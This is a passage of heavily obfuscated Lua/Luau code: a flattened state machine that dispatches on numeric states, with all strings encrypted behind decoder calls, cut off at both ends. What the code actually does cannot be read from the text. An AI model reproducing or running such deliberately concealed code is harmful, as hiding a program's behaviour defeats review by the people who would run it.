g=(m)[(a)[Y(i{1,2,3,{t(41304),t(41027),t(41653)}},11859392595065)] ]H={F}end end else if g<1829016 then if g<1744306 then g=7218802 else U=(L)[(P)[3] ]o=(a)[Y(i{3,2,1,{t(41264),t(41772),t(41391)}},16162151452248)]g=12958378 o=(U)[o]F=(a)[Y(i{1,2,3,4,{t(41563),t(41211),t(41893),t(41747)}},1343055988799)]o=o(U,F)H=o end else g=(a)[Y(i{1,2,{t(41770),t(40912)}},4012921837149)]g=(U)[g]g=g(U)g=609287 end end else if g<2260841 then if g<2092934 then if g<1880575 then g=13473162 W=true(L)[X]=W else x=not X U=U+F H=U<=o H=x and H x=U>=o x=X and x H=x or H x=11113033 g=H and x H=11425701 g=g or H end else if g<2184709 then g=(L)[(P)[1] ]H=(a)[Y(i{2,1,{t(41200),t(41378)}},26899694263139)]H=(g)[H]H=H(g)H={}g=(m)[(a)[Y(i{1,3,2,{t(41599),t(41358),t(41085)}},2895819270726)] ]else g=Z and 13752671 or 4087980 end end else if g<2330289 then if g<2293085 then g=15142384 Z=nil x=nil else q=true H={F}(L)[X]=q g=(m)[(a)[Y(i{3,1,2,{t(41202),t(41908),t(40955)}},29995073818674)] ]end else g=(a)[Y(i{2,1,{t(41701),t(41239)}},13033201518419)]M=U;(n)[g]=M g=3767728 end end end end else if g<3422494 then if g<3024574 then if g<2822725 then if g<2641985 then if g<2564836 then Z=(a)[Y(t(41164),6022537040783)]x=(m)[Z]Z=(a)[Y(t(41487),21977887195983)]g=(x)[Z]Z=0.01 x=g(Z)g=(a)[Y(i{1,2,{t(41093),t(40977)}},22048356656188)]Z=(a)[Y(t(40959),18640395870504)]g=(X)[g]g=g(X)x=(m)[Z]Z=(a)[Y(t(41390),31823744387481)]g=(x)[Z]Z=0.1 x=g(Z)g=(a)[Y(i{2,1,3,{t(41406),t(41101),t(41731)}},25205502191697)]g=(o)[g]g=g(o)g=8717190 else g=true o=(a)[Y(i{1,2,3,{t(41647),t(40942),t(41844)}},16309579464726)]H=(a)[Y(t(41821),21139485330940)]F=(a)[Y(t(41011),25079261883973)];(L)[(P)[1] ]=g U=(K)[1]g=(m)[(a)[Y(i{1,3,2,{t(41356),t(41281),t(40897)}},4857565502851)] ];(U)[H]=o o=(m)[F]F=(a)[Y(t(41302),30756558469553)]H=(o)[F]F=1.7 o=H(F)X=(a)[Y(t(41255),3100364046110)]H=false(L)[(P)[1] ]=H F=(m)[X]X=(a)[Y(t(41103),13138697631430)]o=(F)[X]X=0.1 F=o(X)o=(L)[(P)[2] ]H={}F=o()o=(a)[Y(t(41684),8347507138304)]F=(a)[Y(t(41253),4478416299801)];(U)[o]=F U=nil end else if g<2704821 then g=H and 15744980 or 2819123 else H={}U=nil g=(m)[(a)[Y(i{1,3,2,{t(41134),t(41377),t(41620)}},32353430626661)] ]end end else if g<2865473 then if g<2830303 then f=(a)[Y(i{1,2,{t(40974),t(41323)}},4871603152803)]g=2229750 C=(x)[f]Z=C else H=true g=3269667(L)[(P)[1] ]=H end else if g<3011381 then g=J g=k and 6896807 or 10931687 else g=4640719 end end end else if g<3295199 then if g<3268733 then if g<3183326 then X=(a)[Y(t(41456),13058627476107)]Z=(a)[Y(t(41038),28099273101498)]F=(m)[X]C=(a)[Y(t(41156),17753877079775)]x=(Z)[C]C=20 Z=1 X=F(x,o,Z,C)H=not X g=H and 16234104 or 4455050 else w=(a)[Y(t(40891),5596771848166)]r=(m)[w]d=r O=g g=r and 12747384 or 5095963 end else if g<3273042 then g=11381086 o=nil else g=3269667 end end else if g<3410261 then if g<3387714 then U=(a)[Y(i{1,2,{t(41803),t(41494)}},1501593830507)]H=(L)[(P)[5] ]g=(H)[U]H=(a)[Y(t(41243),21112317636123)]H=(g)[H]H=H(g)g=11577216 else g=(m)[(a)[Y(i{3,2,1,{t(41651),t(40967),t(41666)}},30110716000165)] ]H={}end else l=nil O=s();(L)[O]=l W=S(3783719,{O})r=(a)[Y(t(41642),24049197952283)]l=(m)[r]r=l(W)W=(L)[O]l=not W g=l and 9853431 or 14815671 end end end else if g<4081719 then if g<3803432 then if g<3694557 then if g<3535723 then F=(a)[Y(i{2,3,4,1,{t(41080),t(41712),t(41399),t(41704)}},3528857030194)]U=(L)[(P)[2] ]o=(a)[Y(i{2,1,3,{t(41784),t(41464),t(41904)}},18422839017239)]o=(U)[o]o=o(U,F)g=o and 12958378 or 1757558 H=o else th=nil g=1439300 p=nil end else if g<3771373 then f=nil n=nil g=15856537 else g=true(L)[(P)[1] ]=g U=200 o=U H=1 U=1 F=U g=9180789 U=0 X=F<U U=H-F end end else if g<3982366 then if g<3895873 then o=nil g=11381086 else g=(L)[(P)[1] ]F=(a)[Y(i{1,2,{t(40907),t(41076)}},31490572460487)]H=g()o=(L)[(P)[2] ]U=(o)[F]g=U and 10972560 or 7628303 H=U end else g=(L)[(P)[1] ]H=g()o=(a)[Y(t(40943),29359986727437)]H=(m)[o]o=(a)[Y(t(41749),14490452578346)]g=(H)[o]o=0.3 H=g(o)g=11515191 end end else if g<4363080 then if g<4226578 then if g<4091755 then g=9898694 X=nil x=nil else g=1(L)[(P)[1] ]+=g X=(a)[Y(t(41000),9646105901344)]F=(m)[X]o=(K)[2]X=F(o)F=(a)[Y(i{1,2,{t(41557),t(40979)}},10738027771479)]H=X==F g=H and 3025208 or 10427015 U=(K)[1]end else if g<4304797 then g=8207061 else gh=420 th=(L)[ah]ih=(th)[gh]th=(a)[Y(t(41183),11014706708917)]q=ih~=th g=q and 2323083 or 9758920 end end else if g<4498171 then if g<4427845 then g=(m)[(a)[Y(i{3,2,1,{t(41677),t(41194),t(41542)}},17764017510236)] ]H={w}else X=(a)[Y(t(41038),23364206841886)]x=(a)[Y(t(41347),11530970810031)]F=(X)[x]X=F(o)g=(m)[(a)[Y(i{1,3,2,{t(41805),t(41443),t(41909)}},23624355693410)] ];(L)[(P)[3] ]+=X F=(L)[(P)[4] ]H={F}end else W=(a)[Y(t(41340),15707573669968)]w=(a)[Y(i{2,1,{t(41170),t(41670)}},20893607740735)]r=g W=(Z)[W]W=W(Z,w)g=W and 12838416 or 11244697 O=W end end end end end else if g<6041710 then if g<5272457 then if g<4922021 then if g<4776802 then if g<4645689 then if g<4612841 then b=T(16040593,{v})R=(a)[Y(i{1,2,{t(41481),t(41285)}},23002352773377)]E=(m)[R]R=(a)[Y(i{1,3,2,{t(41811),t(40990),t(41859)}},721133142993)]z=(a)[Y(i{2,1,{t(41312),t(41293)}},2029319066173)]R=(E)[R]R=R(E)E=(m)[z]I=(L)[v]J=#R k={I(J)}z=E(e(k))I=(a)[Y(i{1,2,{t(41240),t(41009)}},31950149043474)]E=(m)[I]k=(L)[v]p=#R J={k(p)}I=E(e(J))J=g E=b(R)p=z~=I g=p and 2867463 or 13622332 k=p else g=16302261 end else if g<4687884 then g=4640719 else n=(a)[Y(t(41619),19391712816764)]Z=(a)[Y(i{3,2,1,{t(41429),t(41624),t(41230)}},8462439149287)]x=(U)[Z]F=g f=(m)[n]n=(a)[Y(i{3,2,1,{t(40995),t(41911),t(41270)}},18161750141776)]C=(f)[n]f=(a)[Y(i{3,1,2,{t(41277),t(41208),t(41484)}},21451490968425)]Z=(C)[f]X=x==Z g=X and 14757268 or 12170957 o=X end end else if g<4855332 then if g<4810908 then H={F}g=(m)[(a)[Y(i{2,1,3,{t(41848),t(40976),t(41643)}},1599023799333)] ]else g=Kh and 15275384 or 16302261 end else if g<4892809 then g=4455050 else Z=true g=Z and 15471288 or 68195 end end end else if g<5083282 then if g<4985575 then if g<4970198 then eh=(L)[Yh]Kh=0 g=12427901 gh=eh==Kh ih=gh else Z=(a)[Y(i{6,3,2,1,7,8,5,4,{t(41104),t(40975),t(41052),t(41861),t(41135),t(41425),t(41195),t(40913)}},24880136191011)]H={Z}g=(m)[(a)[Y(i{1,2,3,{t(40953),t(41322),t(40958)}},25050856762584)] ]end else if g<5039699 then d=(a)[Y(t(40895),10216713178658)]l=(a)[Y(t(41849),13915969771286)]d=(Z)[d]D=g d=d(Z,l)g=d and 10104147 or 15276308 M=d else g=(L)[(P)[1] ]U=(L)[(P)[2] ]H=g(U)H={}g=(m)[(a)[Y(i{3,1,2,{t(41346),t(41852),t(41775)}},10092686086718)] ]end end else if g<5243514 then if g<5141856 then b=(a)[Y(i{2,1,{t(41389),t(41291)}},4168955469625)]v=(m)[b]r=v w=g g=v and 5341432 or 15069126 else eh=1 gh=z==eh g=gh and 7295350 or 15725492 end else D=(a)[Y(t(41874),807324390153)]M=(a)[Y(t(41744),9724013435834)]n=g M=(Z)[M]M=M(Z,D)f=M g=M and 7331085 or 5037849 end end end else if g<5772191 then if g<5382038 then if g<5347843 then if g<5343447 then g=w g=12747384 d=r else g=(m)[(a)[Y(i{3,2,1,{t(41098),t(41296),t(41910)}},20854165810518)] ]C=true H={F}(L)[X]=C end else if g<5363435 then U=100 H=1 o=U U=1 g=2088728 F=U U=0 X=F<U U=H-F else U=(K)[1]g=not U g=g and 12093086 or 16389795 end end else if g<5674577 then if g<5609747 then g=(a)[Y(i{1,2,{t(41168),t(41769)}},28368580814766)]g=(Z)[g]g=g(Z)g=2283378 else Z=false D=(a)[Y(t(41541),17104209354179)];(L)[f]=Z d=N(12409507,{f})M=(m)[D]D=(a)[Y(t(41710),4612336740508)]n=(M)[D]g=14563451 D=2 M=n(D,d)M=(L)[f]n=not M end else o=S(7099034,{})H=(a)[Y(t(41546),4309580024854)]g=(m)[H]H=g(o)o=H g=o and 12337693 or 3818428 end end else if g<5974478 then if g<5792826 then if g<5790153 then g=true(L)[(P)[1] ]=g H=T(11741117,{(P)[2]})g=(m)[(a)[Y(i{2,3,1,{t(41798),t(41526),t(41500)}},14757925729476)] ]H={H}else D=true(L)[X]=D g=7979641 end else if g<5858746 then U=U+F H=U<=o x=not X H=x and H x=U>=o x=X and x H=x or H x=10790281 g=H and x H=15555705 g=g or H else g=Ph g=Kh and 6026281 or 10891995 end end else if g<6034144 then if g<6016317 then g=4899469 else g=(m)[(a)[Y(i{2,3,1,{t(41781),t(41233),t(41574)}},5136974081398)] ]H={w}end else g=H and 6190507 or 8286925 end end end end else if g<7261918 then if g<6794052 then if g<6272250 then if g<6074653 then if g<6043167 then g=f g=C and 5343858 or 14227698 else C=nil g=1 o+=g Z=X Z=nil g=8782025 end else if g<6155784 then U=nil H={}g=(m)[(a)[Y(i{1,3,2,{t(41454),t(41206),t(41682)}},1716020586491)] ]else o=(a)[Y(i{2,1,{t(41407),t(41716)}},4199649453819)]g=true(L)[(P)[1] ]=g H=(U)[o]X=(a)[Y(i{1,2,{t(41567),t(41765)}},10626030317502)];(L)[(P)[2] ]=H g=8286925 F=(L)[(P)[3] ]o=(F)[X];(L)[(P)[4] ]=o end end else if g<6387665 then if g<6343889 then o=(a)[Y(i{1,2,{t(41553),t(41688)}},1720108502593)]H=(U)[o]o=(L)[(P)[2] ]M=(a)[Y(t(41687),7186359809378)]g=H-o o=g x=(a)[Y(t(41057),27705932766321)]H=(a)[Y(i{2,1,{t(41160),t(41654)}},15226739183007)]g=(L)[(P)[3] ]X=(m)[x]x=(a)[Y(t(41806),30596703414629)]F=(X)[x]f=(a)[Y(t(41685),5637808202019)]C=(L)[(P)[4] ]d=(a)[Y(t(41151),25802280110036)]Z=(C)[f]C=(a)[Y(t(41660),7893836653218)]x=(Z)[C]n=(L)[(P)[4] ]f=(n)[M]n=(a)[Y(i{2,1,{t(41392),t(41814)}},32550736795868)]C=(f)[n]M=(a)[Y(t(41760),18100484842606)]n=(a)[Y(t(41155),643846476395)]f=(o)[n]Z=C+f n=(L)[(P)[4] ]f=(n)[M]n=(a)[Y(t(41140),30925020226578)]C=(f)[n]D=(L)[(P)[4] ]M=(D)[d]D=(a)[Y(i{1,2,{t(41182),t(41241)}},21233464222984)]n=(M)[D]D=(a)[Y(t(41525),17205012618114)]M=(o)[D]o=nil f=n+M X=F(x,Z,C,f);(g)[H]=X g=6149493 else g=13257450 end else if g<6447516 then Ah=(a)[Y(t(40960),7566253867303)]q=ih Lh=(a)[Y(t(41038),43616124698)]Ph=(Lh)[Ah]Vh=(L)[ah]Ah=(Vh)[q]Vh=(L)[Yh]Hh=(L)[Yh]Lh=Ph(Ah,Vh,Hh)Ph=(a)[Y(t(41823),15699196070914)]Kh=Lh==Ph Lh=(L)[p]Ph=q==Lh g=Ph and 7810861 or 4855092 else C=(a)[Y(t(41435),26837289147656)]X=(a)[Y(i{1,3,2,{t(41189),t(41267),t(41658)}},14873133678734)]F=(U)[X]Z=(m)[C]C=(a)[Y(i{1,2,3,{t(41863),t(41896),t(41056)}},30930843386843)]x=(Z)[C]Z=(a)[Y(t(41615),18155129379535)]X=(x)[Z]o=F==X g=6041347 H=o end end end else if g<7186667 then if g<7049852 then if g<6866384 then U=(K)[1]H=(a)[Y(t(41038),7820321784363)]F=(a)[Y(i{1,2,{t(41193),t(41885)}},11144906922451)]o=(a)[Y(t(41562),16895915374529)]g=(H)[o]o=(m)[F]X=900000000 F=o(U)o=1 H={g(F,o,X)}g=(m)[(a)[Y(i{1,2,3,{t(41006),t(41583),t(41469)}},34857972824942)] ]H={e(H)}else g=(m)[(a)[Y(i{1,2,3,{t(41709),t(41723),t(41266)}},10097658712768)] ]J=(a)[Y(t(41448),23119173382132)]H={w}k=(m)[J]J=k(z,I,E)end else if g<7100201 then H=1 U=100 o=U g=5811048 U=1 F=U U=0 X=F<U U=H-F else g=Ah p=j(p)Ah=s()O=j(O)E=nil(L)[Ah]=th Hh=(a)[Y(i{2,1,{t(40889),t(41496)}},3368515355362)]h=nil th=(L)[Ah]o=nil eh=j(eh)sh=(a)[Y(t(41159),1158458932851)]Vh=(a)[Y(i{2,1,3,{t(40948),t(40969),t(41815)}},12932353966114)]Vh=(th)[Vh]Vh=Vh(th,Hh)z=nil th=s();(L)[th]=Vh u=nil b=j(b)v=j(v)H={}x=nil Hh=(a)[Y(i{2,3,1,{t(41727),t(41482),t(41327)}},1398052847214)]Uh=(a)[Y(i{1,2,{t(41809),t(41497)}},26178240302964)]Vh=(L)[r]d=j(d)Yh=j(Yh)Hh=(Vh)[Hh]ah=nil J=j(J)Hh=Hh(Vh,Uh)Vh=s()w=nil(L)[Vh]=Hh Kh=j(Kh)Hh=(L)[k]Uh=Hh()Uh=(m)[sh]X=nil k=j(k)M=nil g=(m)[(a)[Y(i{1,3,2,{t(41889),t(41819),t(40954)}},27918227192316)] ]r=j(r)sh=(a)[Y(t(41248),9276895395002)]Hh=(Uh)[sh]sh=G(14573401,{I,Vh,Ah,th,F})gh=j(gh)Ah=j(Ah)R=nil I=j(I)F=j(F)th=j(th)Vh=j(Vh)Uh=Hh(sh)end end else if g<7260857 then if g<7225998 then g=true g=g and 14336180 or 11446232 else H={F}g=(m)[(a)[Y(i{2,1,3,{t(41550),t(41446),t(41288)}},32057224431530)] ]end else O=W g=w g=12838416 end end end else if g<8007852 then if g<7747360 then if g<7369230 then if g<7306981 then Kh=1 eh=(R)[Kh]Kh=(a)[Y(t(41869),15841216595460)]Ph=g gh=(eh)[Kh]Kh=(a)[Y(t(41627),4335725545948)]eh=(th)[Kh]Ah=(L)[v]Vh=Ah(gh)Ah=(L)[v]Hh=Ah(eh)Lh=Vh~=Hh Kh=Lh g=Lh and 5974274 or 8929805 else C=f g=n g=16463031 end else if g<7617479 then g=297774 else F=(a)[Y(i{2,3,1,{t(41118),t(40998),t(41621)}},8568212664399)]o=(L)[(P)[2] ]U=(o)[F]g=10972560 o=(a)[Y(t(41581),26555179542725)]o=(U)[o]o=o(U)H=o end end else if g<7912411 then if g<7814973 then g=Kh and 4667384 or 15811024 else M=d g=l g=10104147 end else d=S(11023923,{X})W=(a)[Y(t(41465),7245978649139)]w=2 r=(m)[W]W=(a)[Y(i{2,1,{t(41528),t(41041)}},21588102816738)]O=(r)[W]W=1 r=O(W,w)O=1 l=r==O g=l and 12744571 or 772595 end end else if g<8258358 then if g<8176672 then if g<8073684 then H=(L)[(P)[5] ]U=(a)[Y(t(41468),19733906006668)]g=not H;(L)[(P)[5] ]=g F=g x=g x=(a)[Y(i{1,3,2,{t(41217),t(41843),t(41274)}},33172579748977)]H=(L)[(P)[3] ]Z=(L)[(P)[5] ]C=(a)[Y(i{3,2,1,{t(41834),t(41414),t(41829)}},32050676393900)]X=Z and C o=X or x g=3405031(H)[U]=o else F=true g=F and 14172301 or 4861153 end else if g<8235168 then Lh=nil g=Lh and 3023124 or 4269644 else M=s()n=T(13327197,{X});(L)[M]=n D=(a)[Y(t(41086),1041755082343)]n=(L)[M]d=(a)[Y(t(41792),32465114618534)]l=N(15797543,{M,X});(m)[D]=n D=(m)[d]d=D(l)d=(a)[Y(t(41019),17125175515402)]D=(m)[d]l=(a)[Y(i{2,3,1,{t(41124),t(41022),t(41077)}},4123211807182)]d=(a)[Y(i{3,1,2,{t(41367),t(40892),t(41046)}},9961884929118)]d=(D)[d]d=d(D,l)g=d and 5791510 or 7979641 end end else if g<8654036 then if g<8638663 then H={}U=nil g=(m)[(a)[Y(i{2,1,3,{t(41106),t(41789),t(41421)}},23835304412552)] ]else g=14296643 end else U=nil g=3354268 end end end end end end else if g<13381418 then if g<10951420 then if g<9473794 then if g<9137755 then if g<8874351 then if g<8775657 then if g<8728991 then U=nil X=nil H={}g=(m)[(a)[Y(i{1,3,2,{t(41145),t(40893),t(41035)}},19339393132546)] ]F=nil o=nil else g=(L)[(P)[4] ]g=g and 8046415 or 16446549 end else if g<8779589 then g=(m)[(a)[Y(i{2,1,3,{t(41012),t(41133),t(41415)}},4449345236529)] ]H={w}else X,C=x(F,X)g=X and 6047049 or 1123317 end end else if g<9065440 then if g<8922826 then d=true g=d and 15272541 or 6386196 else Lh=gh~=eh Kh=Lh g=5974274 end else if g<9128111 then H=(a)[Y(i{1,2,{t(41112),t(40906)}},27821003223454)]g=(m)[H]F=(L)[(P)[1] ]x=(a)[Y(i{3,1,2,{t(41249),t(41703),t(41111)}},28530598218589)]x=(F)[x]X={x(F)}F={g(e(X))}o=(F)[3]H=(F)[1]g=9898694 U=(F)[2]F=H else Uh=(a)[Y(i{1,3,2,{t(41244),t(41865),t(41069)}},11229924707350)]Hh=(L)[r]Vh=(Hh)[Uh]Hh=(a)[Y(t(41300),26145875686133)]Hh=(Vh)[Hh]Hh=Hh(Vh)g=7168360 th=Hh end end end else if g<9304666 then if g<9169206 then if g<9156921 then f=Z d=(a)[Y(t(41037),2258821138870)]D=(a)[Y(t(41409),24859080811513)]D=(n)[D]D=D(n,d)M=D g=D and 1272579 or 13477819 else U=nil g=(m)[(a)[Y(i{2,3,1,{t(41154),t(41366),t(40934)}},23527091720459)] ]H={}end else if g<9183852 then x=not X U=U+F H=U<=o H=x and H x=U>=o x=X and x H=x or H x=756107 g=H and x H=11331081 g=g or H else g=(a)[Y(i{2,1,{t(41228),t(41575)}},7492729964505)]f=(a)[Y(i{2,1,3,{t(41585),t(41342),t(41671)}},19107327491624)]g=(o)[g]H=(a)[Y(i{2,1,{t(41593),t(40945)}},3472115790165)]f=(F)[f]g=g(o,X)g=(m)[H]C={f(F)}f={g(e(C))}Z=(f)[3]x=(f)[2]H=(f)[1]g=15856537 C=H end end else if g<9394528 then if g<9350973 then J=nil k=nil g=14058040 else U=(a)[Y(t(41020),9690601175497)]H=(m)[U]U=(a)[Y(t(41064),13193906567667)]g=(H)[U]H=g()g=11515191 U=H end else M=(L)[f]n=not M g=n and 8244618 or 14563451 end end end else if g<10098128 then if g<9872939 then if g<9697248 then if g<9641927 then g=14880636 else C=(a)[Y(t(41410),11648753320786)]X=(a)[Y(i{2,3,1,{t(40925),t(41058),t(41116)}},5994407857046)]F=(U)[X]g=2698270 Z=(m)[C]C=(a)[Y(i{1,2,3,{t(41328),t(41609),t(40936)}},5616615744067)]x=(Z)[C]Z=(a)[Y(t(41184),23739200239766)]X=(x)[Z]o=F==X H=o end else if g<9807996 then th=g gh=(L)[X]ih=gh g=gh and 12427901 or 4960874 else g=14815671 l=true(L)[X]=l end end else if g<9976485 then if g<9915962 then o,x=F(U,o)g=o and 10068854 or 16499288 else H={}g=(m)[(a)[Y(i{1,3,2,{t(41394),t(41341),t(41316)}},19276162424205)] ]U=nil end else f=(a)[Y(i{2,1,{t(41458),t(41755)}},15321439095300)]X=o C=(a)[Y(t(41490),8665887447896)]C=(x)[C]C=C(x,f)g=C and 2823403 or 2229750 Z=C end end else if g<10561644 then if g<10125541 then if g<10108843 then f=M g=D g=7331085 else H={}g=(m)[(a)[Y(i{1,3,2,{t(41804),t(41812),t(41657)}},34898778191218)] ]end else if g<10320889 then v=(a)[Y(i{2,1,{t(41153),t(41520)}},23937867614750)]w=(m)[v]v=(a)[Y(i{1,2,{t(41016),t(41597)}},21688177276490)]r=(w)[v]g=15081699 d=r else F=true(L)[(P)[2] ]=F g=574742 end end else if g<10907280 then if g<10854306 then g=(a)[Y(i{3,22,23,21,17,16,20,14,9,18,24,5,11,19,13,8,12,6,1,7,25,15,10,4,2,{t(40984),t(41251),t(41384),t(41324),t(41472),t(41402),t(40991),t(41463),t(41833),t(41329),t(41138),t(41572),t(41382),t(41897),t(41486),t(41679),t(40952),t(41587),t(41114),t(41165),t(41310),t(41595),t(41830),t(40940),t(41907)}},2921764928750)]x=U H=(a)[Y(i{2,1,{t(40903),t(41215)}},13188162532059)];(m)[H]=g x=nil g=5811048 else g=15725492 gh=nil eh=nil end else q=(a)[Y(i{1,2,{t(40909),t(41332)}},2773604621)]p=(a)[Y(t(41700),19285159383885)]Yh=(a)[Y(i{2,1,{t(41521),t(41729)}},28931666967924)]J=(a)[Y(t(41017),15888717728360)]k={J,p,q,Yh}J=0 q=#k p=1 Yh=q g=1439300 q=1 ah=q q=0 ih=ah<q q=p-ah end end end end else if g<12162357 then if g<11385168 then if g<11039193 then if g<10989834 then if g<10966915 then g=(L)[(P)[1] ]g=g and 225626 or 8773699 else U=H H=(a)[Y(i{2,1,{t(41895),t(41120)}},10741286522081)]g=(a)[Y(i{2,1,3,{t(41870),t(41299),t(41187)}},10101882339573)]F=(a)[Y(i{2,1,{t(41169),t(41787)}},31287166871365)]g=(U)[g]g=g(U,H)o=g g=(L)[(P)[2] ]H=(a)[Y(i{1,2,3,{t(41483),t(41899),t(41178)}},30188581059085)]H=(g)[H]H=H(g,F)F=H H=(a)[Y(i{2,3,1,{t(41537),t(41640),t(40901)}},25955511578854)]g=(a)[Y(i{3,2,1,{t(41395),t(41010),t(40989)}},8388003616040)]g=(F)[g]g=g(F,H)X=g g=X and 9271719 or 8717190 end else if g<11028522 then H=1 U=(K)[1]g=U==H g=g and 5676428 or 14821256 else g=b g=5341432 r=v end end else if g<11257152 then if g<11150295 then g=(a)[Y(i{1,21,3,10,25,13,8,16,12,18,14,20,7,9,5,24,6,22,11,23,19,15,4,2,17,{t(40980),t(40888),t(41075),t(40931),t(41778),t(41650),t(40970),t(41756),t(41603),t(41799),t(41314),t(41847),t(41315),t(41354),t(40910),t(41739),t(41042),t(41498),t(41352),t(41757),t(41198),t(41229),t(41423),t(41745),t(41707)}},8008826989179)]x=U H=(a)[Y(i{2,1,{t(41549),t(41190)}},14466829404140)]x=nil(m)[H]=g g=2088728 else v=(a)[Y(t(41509),23968401611877)]v=(Z)[v]w=g b=(a)[Y(i{2,1,3,{t(41207),t(41373),t(41802)}},2603370073693)]v=v(Z,b)W=v g=v and 7261481 or 16407709 end else if g<11343634 then g=(m)[(a)[Y(i{3,2,1,{t(41493),t(41459),t(41503)}},20151091508124)] ]H={}else g=(m)[(a)[Y(i{3,2,1,{t(41544),t(40996),t(41887)}},11744295066606)] ]H={}U=nil end end end else if g<11614596 then if g<11493642 then if g<11429551 then H={}g=(m)[(a)[Y(i{1,3,2,{t(41370),t(41113),t(40927)}},16959716707118)] ]else g=(m)[(a)[Y(i{3,1,2,{t(41692),t(41831),t(41691)}},8232070599737)] ]H={}end else if g<11569148 then X=(a)[Y(t(41278),23508239035612)]F=(m)[X]X=(a)[Y(t(41338),1861403987746)]o=(F)[X]F=o()H=F-U o=2 g=H<o g=g and 4012631 or 9917477 else g=true g=g and 13825878 or 10109624 end end else if g<11874748 then if g<11694727 then r=(a)[Y(t(41084),24236131767447)]O=(m)[r]w=(a)[Y(t(41461),230014342519)]f=g r=(a)[Y(i{2,1,{t(41191),t(41238)}},10171217204385)]d=(O)[r]O=d()r=(m)[w]w=(a)[Y(i{1,2,{t(41892),t(41431)}},31714911018138)]d=(r)[w]r=d()M=O==r C=M g=M and 6042434 or 317441 else g=(L)[(P)[1] ]H={g()}H={e(H)}g=(m)[(a)[Y(i{2,1,3,{t(40908),t(41605),t(41886)}},30304532256035)] ]end else g=(m)[(a)[Y(i{2,1,3,{t(41618),t(41214),t(41121)}},12121420442474)] ]H={}end end end else if g<12806156 then if g<12580363 then if g<12366860 then if g<12302697 then n=(a)[Y(t(41444),698471127593)]Z=(a)[Y(i{1,2,3,{t(40933),t(41773),t(41344)}},8077058452548)]g=14757268 x=(U)[Z]f=(m)[n]n=(a)[Y(i{3,1,2,{t(41725),t(40920),t(41311)}},32509676666789)]C=(f)[n]f=(a)[Y(t(41339),32761381447638)]Z=(C)[f]X=x==Z o=X else g=true(L)[(P)[1] ]=g g=3818428 end else if g<12416116 then g=true(L)[(P)[1] ]=g H={}g=(m)[(a)[Y(i{2,1,3,{t(41129),t(41860),t(41499)}},21654883061938)] ]else g=th g=ih and 4780102 or 15154956 end end else if g<12767013 then if g<12745665 then g=3418282 O=1 l=d(O)l=d()else g=O g=d and 15180664 or 13257450 end else g=true(L)[(P)[1] ]=g H={}g=(m)[(a)[Y(i{2,3,1,{t(41286),t(41837),t(41353)}},22678556716950)] ]end end else if g<12962101 then if g<12879189 then if g<12844018 then d=O g=r g=7821947 else g=13989520 q=1 ih=100 th=ih ih=1 gh=ih ih=0 eh=gh<ih ih=q-gh end else if g<12946669 then n=(a)[Y(t(41179),28119751049099)]r=(a)[Y(t(41185),20778541104786)]M=g d=g f=(m)[n]O=(m)[r]r=(a)[Y(i{2,1,{t(41361),t(41313)}},17819929263386)]l=(O)[r]O=(a)[Y(i{2,1,{t(41554),t(41213)}},15443309062182)]D=l and O d=(a)[Y(t(41888),7891348581549)]n=D or d Z=(f)[n]g=7439505 M=(a)[Y(t(41681),13146734813623)]n=S(12771457,{X})f=Z(n,M)f=s()Z=false M=(a)[Y(t(41002),27159098355803)];(L)[f]=Z n=(m)[M]M=(a)[Y(t(41262),12539041264893)]Z=(n)[M]D=y(15433866,{f})M=0 n=Z(M,D)M=(a)[Y(t(41515),34204460786793)]n=(m)[M]M=(a)[Y(t(41360),18895272695550)]Z=(n)[M]M=0.1 n=Z(M)Z=(L)[f]else U=H g=U and 1046734 or 8697680 end end else if g<13311232 then if g<13091696 then F=(a)[Y(i{2,1,{t(41751),t(41558)}},32165854369087)]U=(a)[Y(t(41181),16548373372057)]Z=120 H=(m)[U]x=(a)[Y(t(41898),3039173772295)]o=(m)[F]F=(a)[Y(t(41536),18689934255241)]U=(o)[F]X=(m)[x]x=(a)[Y(i{2,1,{t(40963),t(41695)}},35014862585032)]F=(X)[x]x=1 X={F(x,Z)}o=U(e(X))g=(H)[o]U=(a)[Y(i{25,7,19,3,24,6,11,9,16,22,8,14,20,2,1,10,21,12,23,13,4,15,18,17,5,{t(41690),t(41330),t(41078),t(41321),t(41333),t(41100),t(41420),t(41336),t(41196),t(41177),t(41736),t(41672),t(40981),t(41636),t(41699),t(41759),t(41722),t(41827),t(41884),t(41030),t(41545),t(41573),t(41065),t(41072),t(41492)}},33227790605457)]H=g(U)g=(m)[(a)[Y(i{2,3,1,{t(41638),t(41102),t(41350)}},420147533865)] ]H={}else g=15378964 end else g=true(L)[(P)[1] ]=g H={}g=(m)[(a)[Y(i{2,3,1,{t(41199),t(40957),t(41733)}},14531864134746)] ]end end end end end else if g<15071516 then if g<14066133 then if g<13742087 then if g<13543370 then if g<13476767 then if g<13473452 then w=(a)[Y(i{5,1,4,7,2,6,3,{t(41452),t(41457),t(41713),t(41413),t(41005),t(41835),t(40887)}},26008310979062)]v=s()u=(a)[Y(i{1,2,{t(41659),t(41343)}},22361454053196)]b=G(6835222,{})E=(a)[Y(i{1,2,{t(41089),t(41231)}},12551526070200)];(L)[v]=b h=(m)[u]u=(a)[Y(t(41335),24361285922641)]z=(a)[Y(t(41598),34793321915042)]R=(a)[Y(t(40894),10090694452480)]b=(h)[u]u=(a)[Y(t(41148),19651482575417)]h=b(u)u=(m)[E]E=(a)[Y(t(41467),33819791328498)]b=(u)[E]E=(a)[Y(t(41807),1610981473679)]u=b(E)E=(h)[R]R=(u)[z]b=E~=R g=b and 8776287 or 652760 else g=nil U=K o=g g=(a)[Y(i{6,3,7,5,4,1,2,{t(41295),t(41873),t(41225),t(41697),t(40914),t(41504),t(41209)}},5237229552648)]F=g g=false x=s()X=s();(L)[X]=g g=nil(L)[x]=g Z=(a)[Y(t(40946),29150230452108)]g=T(5789881,{X,x});(L)[x]=g H=(L)[x];(m)[Z]=H Z=(L)[X]g=Z and 13543237 or 4899469 end else if g<13496548 then g=M and 2432200 or 3767728 else H={F}g=(m)[(a)[Y(i{3,2,1,{t(41797),t(41188),t(41903)}},33897667557031)] ]end end else if g<13624292 then if g<13575352 then H={}U=nil g=(m)[(a)[Y(i{1,2,3,{t(41221),t(41003),t(41905)}},10689918233540)] ]o=nil else p=I~=E k=p g=2867463 end else if g<13657450 then th=(a)[Y(i{1,2,{t(41094),t(41430)}},21172973458642)]p=q mh=(m)[th]th=(a)[Y(i{5,2,4,1,3,{t(41635),t(41123),t(41786),t(41400),t(41569)}},16215828440154)]th=(mh)[th]gh=(k)[p]th=th(mh,gh)g=th and 16127826 or 3601676 else g=15154956 end end end else if g<13984886 